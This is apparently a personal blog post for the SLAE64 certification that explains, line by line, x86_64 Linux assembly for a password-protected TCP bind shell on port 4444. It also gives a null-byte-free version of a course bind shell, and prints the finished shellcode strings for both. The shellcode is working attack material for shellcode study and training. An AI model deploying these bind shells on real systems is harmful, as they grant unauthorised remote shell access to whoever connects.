Skip to main content

SLAE64 - Assignment 1

Following completion of the SLAE32 course (http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/index.html), I decided to take advantage of the Pentester Academy account we have at work to continue the training with SLAE64 (http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html). So, we'll delve into each assignment like we did before and because it's part of the certification challenge.

Assignment 1 requirements are as follows:

  • Create a Shell_Bind_TCP shellcode
    • Binds to a port
    • Needs a "Passcode"
    • If Passcode is correct then Execs Shell
  • Remove 0x00 from the Bind TCP Shellcode discussed

Ok, easy enough. The full code can be found here: https://github.com/blu3gl0w13/SLAE64/tree/master/assignment-1

If you've read my previous blog posts on SLAE32 certification challenge you might be thinking, this should be easy. I could just copy/paste my previous code right? I thought the same thing until I started taking this course. There are actually some pretty big differences and along the same lines at least a few similarities. Let's talk about the differences first.

In x86_64 bit assembly, the main difference, besides the general purpose register names for the additional 32 bits, system calls are quite a bit different. In x86 assembly, EAX is used for the system call number and resulting system call return value. EBX, ECX, and EDX would hold any arguments to the system call. As you can see, it's pretty easy to run out of registers to use for system calls and occasionally it would be necessary to store a pointer to additional arguments on the stack. In addition, the INT 0x80 interrupt code is used to execute the system call. Socket system calls all begin with the define __NR_socketcall 102 system call.

In x86_64 assembly, RAX is used for the system call number and resultant return value. For the arguments of the system call, RDI, RSI, RDX, R10, R8, and R9 are used in that order. So, there's plenty of room. System calls are also called by giving the SYSCALL instruction instead of the INT 0x80 interrupt code. Finally, in x86_64 assembly, you can make a #define __NR_socket 41 system call directly, without invoking define __NR_socketcall 102 first.

Now that we have that out of the way, let's jump into the code. We'll start this script like before defining a global starting point with global _start. Following this, we declare our .text section and create our starting point label. In order to avoid NULL bytes, we'll initialize RAX with an XOR with itself and then copy 0x29 which is the system call number for SOCKET. After this, we'll set up our arguments to SOCKET: 0x2 = AF_INET, 0x1 = SOCK_STREAM, and 0x6 = TCP. This information can be found in the following places:
  • /usr/include/x86_64-linux-gnu/asm/unistd_64.h (SOCKET system call)
  • man 2 socket (AF_INET, SOCK_STREAM)
  • /etc/protocols (TCP)
Finally, we issue the syscall instruction to create our socket. Once that is finished, we'll move our SOCKFD return value from RAX to RDI.

global _start

section .text

_start:

 ; socket syscall
 ; define __NR_socket 41
 ; 

 xor rax, rax  ; initialize rax
 mov al, 0x29  ; int socket(int domain, int type, int protocol)
 xor rdi, rdi  ;
 add rdi, 0x2  ; AF_INET
 xor rsi, rsi  ;
 add rsi, 0x1  ; SOCK_STREAM
 xor rdx, rdx  ;
 add rdx, 0x6  ; TCP
 syscall   ; syscall

 ; save socketfd for later

 mov rdi, rax  ; socketfd into rdi

The next part of the code binds our socket to listen on 0.0.0.0:4444. We'll start by initializing RAX again with an XOR instruction. We'll do the same with EDX and then copy 0x10 into DL as our third argument to our BIND system call. The next set of instructions set up the stack which will be used as our second argument. In order to use this setup though, we'll have to adjust the stack after our MOV instructions and then copy the address of the top of the stack into RSI. Once our registers are setup, don't forget RDI is set up already thanks to the last instruction in the previous block of code, we'll issue the syscall instruction to execute the system call.

        ; define __NR_bind 49
 ; struct sockaddr_in {
 ;      sa_family_t    sin_family address family: AF_INET
        ;      in_port_t      sin_port   port in network byte order 
        ;      struct in_addr sin_addr   internet address


 xor rax, rax   ; initialize rax
 mov al, 0x31   ; int bind(int sockfd, const struct sockaddr *addr,  
                                        ; socklen_t addrlen)
 xor rdx, rdx   ; initialize rdx
 mov dl, 0x10   ; socklen_t addrlen (16)
 xor rsi, rsi   ; initialize rsi
 mov [rsp - 0x4], esi  ; IP Addr 0.0.0.0
 mov word [rsp - 0x6], 0x5c11 ; Port 4444
 mov [rsp - 0xa], esi  ; null byte
 mov byte [rsp - 0x8], 0x2 ; AF_INET
 sub rsp, 0x8   ; adjust stack
 mov rsi, rsp   ; pointer to NULL byte
 syscall    ; syscall

Great, our socket is setup, and it's bound. Next up is to have it listen and then accept connections. We'll cover both now. The listen system call is pretty straight forward. We initialize RAX and then copy 0x32 into AL. RDI still holds our SOCKFD so we don't have to worry about that. RSI is initialized with an XOR instruction and then increased by one with the INC instruction. With our registers setup, we issue the syscall insruction. Once our socket is listening, we need to have it accept connections with the define __NR_accept 43 system call. Initialize RAX to zero with an XOR instruction, push its value onto the stack, and then copy our system call number into AL. All of this helps us avoid NULL bytes in our resulting shellcode. Next, we setup RSI by pushing the address to the top of our stack into it. It really doesn't matter what we have in argument two for this situation so we just need a pointer to a NULL byte without introducing a NULL byte into our shellcode. Our address is 16 bytes long so we push 0x10 onto the stack and copy the new stack pointer into RDX and then execute our syscall instruction. The rest of the instructions make sure we hold onto our SOCKFD just in case into R15, and then we move our ACCEPTFD into RDI and then store it again into R9. This probably isn't necessary and I'm being overly cautious.

       ; define __NR_listen 50

 xor rax, rax
 mov al, 0x32  ; int listen(int sockfd, int backlog)
 xor rsi, rsi  ; initialize rsi
 inc rsi   ; int backlog
 syscall   ; syscall
 

 ; define __NR_accept 43

 xor rax, rax
 push rax
 mov al, 0x2b  ; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)
 mov rsi, rsp  ; struct sockaddr *addr
 push byte 0x10  ; 
 mov rdx, rsp  ; socklen_t *addrlen
 syscall   ; syscall
 xor r15, r15  ; initialize r15
 mov r15, rdi  ; save sockfd just in case
 mov rdi, rax  ; acceptfd for later
 xor r9, r9
 mov r9, rdi  ; to be sure we keep our acceptfd

Excellent, with our socket setup, we'll begin to setup the password requirement. The first set of instructions sets up register R14 to push a NULL byte onto the stack and then our password H4xx0r01. We have to put this into a register first before pushing it onto the stack because the PUSH instruction can ONLY push a q-word onto the stack if it's in a register. I learned this the hard way after a lot of segfaults and a lot of reading the Intel manual. Once the stack is setup, we move the stack pointer into R14 because we'll need it later for our comparison. We finish this block by adding 0x10 bytes to our stack address. This will help make sure we don't accidentally overwrite our password just in case. The next block of code redirects our ACCEPTFD to standard in, out, and error. We'll initialize RAX again and will use the INC instruction to get RSI setup for each system call. Remember, RDI holds are ACCEPTFD which we will use as our first argument to the define __NR_dup2 33 system call.

password:

 ; password onto stack in safe place

 xor r14, r14
 push  r14   ; NULL byte onto stack
 mov r14, 0x3130723078783448 ; '10r0xx4H'
 push r14
 mov r14, rsp   ; pointer to password on stack
 sub rsp, 0x10   ; adjust stack 16 bytes so we don't 
                                        ; accidentally overwrite our password

duper:
        ; define __NR_dup2 33

        xor rax, rax
        mov al, 0x21            ; int dup2(int oldfd, int newfd)
        xor rsi, rsi            ; int newfd (0 for stdin)
        syscall                 ; syscall
        xor rax, rax            ;
        mov al, 0x21            ; int dup2(int oldfd, int newfd)
        inc rsi                 ; int newfd (now 1 for std out)
        syscall                 ; syscall
        xor rax, rax            ;
        mov al, 0x21            ; int dup2(int oldfd, int newfd)
        inc rsi                 ; int newfd (2 for stdout)
        syscall                 ; syscall

This next block of code begins our password prompt. I definitely got a little more fancy than necessary but that's only because I wanted to challenge myself a bit more. This first block uses the define __NR_write 1 system call to pass a faux prompt to the end user asking for a password. We need to push our string onto the stack in reverse order to follow little endian format.

passprompt:

 ; define __NR_write 1
 ; send prompt through socket

 mov rdi, r9
 push byte 0x1
 pop rax     ; ssize_t write(int fd, const void *buf, 
                                                ; size_t count)
 xor rsi, rsi    ; initialize rsi
 push  rsi    ; push NULL onto the stack
 mov rsi, 0x0a203a64726f7773
 push rsi
 mov rsi, 0x7361502061207265
 push rsi
 mov rsi, 0x746e452065736165
 push rsi
 push word 0x6c50   ; 'lP'
 mov rsi, rsp    ; const void *buf
 xor rdx, rdx    ;
 mov dl, 26    ; size_t count
 syscall     ; syscall

Next up, we the define __NR_read 0 system call to read in 16 bytes passed through standard in via the socket. Once 16 bytes are passed, we will need to check the value entered. This is what we do in the block of code with the passwordcheck: label. I chose to use CMPSQ which requires addresses to our comparison values in RDI, and RSI. SCASQ could've also been used but would have required us to use RAX with RDI. If the password matches, we jump short to our shelltime: label. If it doesn't match (ZF not set), we jump back to our passprompt: label and send our faux prompt through the socket again.

 ; define __NR_read 0

 xor rax, rax  ; ssize_t read(int fd, void *buf, size_t count)
 xor rsi, rsi  ; 
 push rsi
 lea rsi, [rsp -0x10] ; pointer to buffer with entered password
 xor rdx, rdx  ; initialize rdx
 add dl, 0x10  ; size_t count
 syscall   ; syscall

passwordcheck:
 mov rdi, r14  ; password for comparison
 cmpsq   ; compare passwords
 jz shelltime  ; password valid
 jnz passprompt  ; password invalid

Finally, when the correct password is sent, we call define __NR_execve 59 system call to launch /bin//sh -i. If you've ready any of my SLAE32 blog posts, you know I'm a fan of some sort of indication we have a prompt. In a real situation this would just bloat our shellcode and would need to be made more efficient. One thing to notice, is that we can push hs//nib/ onto the stack all at once from RDI. This is a benefit of x86_64 assembly with the larger registers.

shelltime: 

 ; define __NR_execve 59
 ; /bin//sh -i
 ; int execve(const char *filename, char *const argv[], char *const envp[])

 xor rax, rax
 mov al, 0x3b   ; int execve(const char *filename, char *const argv[], 
                                        ; char *const envp[])
 xor rdi, rdi   ; 
 push rdi   ; NULL byte onto stack
 mov rdi, 0x68732f2f6e69622f ; 'hs//nib/'
 push rdi   ; 'hs//nib/' onto stack
 mov rdi, rsp   ; pointer to 'hs//nib/'
 xor rsi, rsi   ; 
 push rsi   ; NULL byte onto stack
 push word 0x692d  ; 'i-'
 xor r10, r10   ;
 mov r10, rsp   ; store rsp temporarily
 push rsi   ; NULL byte
 push r10   ; '-i'
 push rdi   ; 'hs//nib/'
 mov rsi, rsp   ; char *const argv[]
 xor rdx, rdx   ;
 push rdx   ; NULL byte onto stack
 mov rdx, rsp   ; char *const envp[]
 syscall    ; syscall

Here's our shellcode.

"\x48\x31\xc0\xb0\x29\x48\x31\xff\x48\x83\xc7\x02\x48\x31\xf6\x48\x83\xc6\x01\x48\x31\xd2\x48\x83"
"\xc2\x06\x0f\x05\x48\x89\xc7\x48\x31\xc0\xb0\x31\x48\x31\xd2\xb2\x10\x48\x31\xf6\x89\x74\x24\xfc"
"\x66\xc7\x44\x24\xfa\x11\x5c\x89\x74\x24\xf6\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x48\x89\xe6\x0f"
"\x05\x48\x31\xc0\xb0\x32\x48\x31\xf6\x48\xff\xc6\x0f\x05\x48\x31\xc0\x50\xb0\x2b\x48\x89\xe6\x6a"
"\x10\x48\x89\xe2\x0f\x05\x4d\x31\xff\x49\x89\xff\x48\x89\xc7\x4d\x31\xc9\x49\x89\xf9\x4d\x31\xf6"
"\x41\x56\x49\xbe\x48\x34\x78\x78\x30\x72\x30\x31\x41\x56\x49\x89\xe6\x48\x83\xec\x10\x48\x31\xc0"
"\xb0\x21\x48\x31\xf6\x0f\x05\x48\x31\xc0\xb0\x21\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb0\x21\x48\xff"
"\xc6\x0f\x05\x4c\x89\xcf\x6a\x01\x58\x48\x31\xf6\x56\x48\xbe\x73\x77\x6f\x72\x64\x3a\x20\x0a\x56"
"\x48\xbe\x65\x72\x20\x61\x20\x50\x61\x73\x56\x48\xbe\x65\x61\x73\x65\x20\x45\x6e\x74\x56\x66\x68"
"\x50\x6c\x48\x89\xe6\x48\x31\xd2\xb2\x1a\x0f\x05\x48\x31\xc0\x48\x31\xf6\x56\x48\x8d\x74\x24\xf0"
"\x48\x31\xd2\x80\xc2\x10\x0f\x05\x4c\x89\xf7\x48\xa7\x74\x02\x75\xaa\x48\x31\xc0\xb0\x3b\x48\x31"
"\xff\x57\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\x48\x31\xf6\x56\x66\x68\x2d\x69"
"\x4d\x31\xd2\x49\x89\xe2\x56\x41\x52\x57\x48\x89\xe6\x48\x31\xd2\x52\x48\x89\xe2\x0f\x05"

And now we run it to make sure it works. While 310 bytes isn't horrible, I wouldn't use such a bloated script in a real penetration assessment. I like the password protection scheme though so might edit this to reduce its size a bit at a later time.

 

 For the next part of the assignment we were tasked with changing Vivek's BindShell.nasm from the course so that it didn't have any NULL bytes. The original code can be found here: https://github.com/blu3gl0w13/SLAE64/blob/master/assignment-1/BindShell.nasm

 Below is the adjusted BindShell-adjusted.nasm.

;-------------------------------------------------
; BindShell-adjusted.nasm
; by Michael Born (@blu3gl0w13)
; Student ID: SLAE64-1439
; November 7, 2016
; Original version by: Vivek Ramachandran
; SecurityTube Linux Assembly Expert 64
;-------------------------------------------------

global _start


_start:

 ; sock = socket(AF_INET, SOCK_STREAM, 0)
 ; AF_INET = 2
 ; SOCK_STREAM = 1
 ; syscall number 41 

 xor rax, rax
 mov al, 41
 xor rdi, rdi
 mov dil, 2
 xor rsi, rsi
 mov sil, 1
 xor rdx, rdx
 syscall

 ; copy socket descriptor to rdi for future use 

 mov rdi, rax


 ; server.sin_family = AF_INET 
 ; server.sin_port = htons(PORT)
 ; server.sin_addr.s_addr = INADDR_ANY
 ; bzero(&server.sin_zero, 8)

 xor rax, rax 
 push rax
 mov dword [rsp-4], eax
 mov word [rsp-6], 0x5c11
 mov [rsp - 0xa], eax
 mov byte [rsp-8], 0x2
 sub rsp, 8


 ; bind(sock, (struct sockaddr *)&server, sockaddr_len)
 ; syscall number 49

 xor rax, rax
 mov al, 49
 mov rsi, rsp
 xor rdx, rdx
 mov dl, 16
 syscall


 ; listen(sock, MAX_CLIENTS)
 ; syscall number 50

 xor rax, rax
 mov al, 50
 xor rsi, rsi
 mov sil, 2
 syscall


 ; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
 ; syscall number 43

 xor rax, rax
 mov al, 43
 sub rsp, 16
 mov rsi, rsp
        mov byte [rsp-1], 16
        sub rsp, 1
        mov rdx, rsp

        syscall

 ; store the client socket description 
 xor r9, r9
 mov r9, rax 

        ; close parent

 xor rax, rax
        mov al, 3
        syscall

        ; duplicate sockets

        ; dup2 (new, old)
        mov rdi, r9
 xor rax, rax
        mov al, 33
        xor rsi, rsi
        syscall

 xor rax, rax
        mov al, 33
 inc rsi
        syscall

 xor rax, rax
        mov al, 33
        inc rsi
        syscall



        ; execve

        ; First NULL push

        xor rax, rax
        push rax

        ; push /bin//sh in reverse

 xor rbx, rbx
        mov rbx, 0x68732f2f6e69622f
        push rbx

        ; store /bin//sh address in RDI

        mov rdi, rsp

        ; Second NULL push
        push rax

        ; set RDX
        mov rdx, rsp


        ; Push address of /bin//sh
        push rdi

        ; set RSI

        mov rsi, rsp

        ; Call the Execve syscall
        add al, 59
        syscall

So how did we do? Let's check the shellcode output. For this, we'll use some scripts I developed during the SLAE32 class found here: https://github.com/blu3gl0w13/SLAE64/tree/master/scripts. Looks like we don't have any NULL bytes. Great!

"\x48\x31\xc0\xb0\x29\x48\x31\xff\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\x48\x31\xd2"
"\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\x5c"
"\x89\x44\x24\xf6\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x48\x31\xc0\xb0\x31\x48\x89"
"\xe6\x48\x31\xd2\xb2\x10\x0f\x05\x48\x31\xc0\xb0\x32\x48\x31\xf6\x40\xb6\x02\x0f"
"\x05\x48\x31\xc0\xb0\x2b\x48\x83\xec\x10\x48\x89\xe6\xc6\x44\x24\xff\x10\x48\x83"
"\xec\x01\x48\x89\xe2\x0f\x05\x4d\x31\xc9\x49\x89\xc1\x48\x31\xc0\xb0\x03\x0f\x05"
"\x4c\x89\xcf\x48\x31\xc0\xb0\x21\x48\x31\xf6\x0f\x05\x48\x31\xc0\xb0\x21\x48\xff"
"\xc6\x0f\x05\x48\x31\xc0\xb0\x21\x48\xff\xc6\x0f\x05\x48\x31\xc0\x50\x48\x31\xdb"
"\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48"
"\x89\xe6\x04\x3b\x0f\x05"

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert 64-bit certification:

  http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html

 Student ID: SLAE64 - 1439


 Next: SLAE64 - Assignment 2

Comments

Popular posts from this blog

SLAE/SLAE64 Course Review

After recently finishing both the SLAE (http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/index.html) and SLAE64 (http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html) courses available through SecurityTube Training, and earning both certifications, I thought I would write a review of the training itself. Personally, I chose these course as a way to learn Assembly in preparation for the Crack The Perimeter (CTP) course and OSCE certification. After taking the Pentesting With Kali (PWK) class and earning the OSCP, I knew I needed to fill some gaps in my knowledge, and specifically with C and Assembly programming. Seeing that there aren't many training offerings that aim to teach Assembly specific to penetration testing and shellcoding, I gave SLAE a try.

  If you don't care about the certification itself, you can obtain all of SecurityTube's videos for a small monthly fee through Pentes…

PWK and the OSCP Review

Back in 2014 I started down the Pentesting With Kali (PWK) course about a month after passing the CISSP exam, for which I self studied for about 4 months. What can I say, I was a glutton for punishment but it was well worth it. I started off with 90 days, but due to a crazy work schedule, wound up extending it another 30 for a total of 120 days of lab access. I'm not as young as I would like to think I am and have other important responsibilities as Dad and Husband which I consider "Priority 1". So, my time to study, perform the homework assignments, go through the modules, videos, and lab work were limited to 2 hours in the morning before work (typically 5am until 7am), and then again for a few hours after everyone was asleep in the house (typically 9pm until 11pm or Midnight). Weekends I could usually spend up to 6 hours on Saturdays and Sundays studying which helped tremendously.

Other people have already done a great job at reviewing the PWK course and the OSCP chall…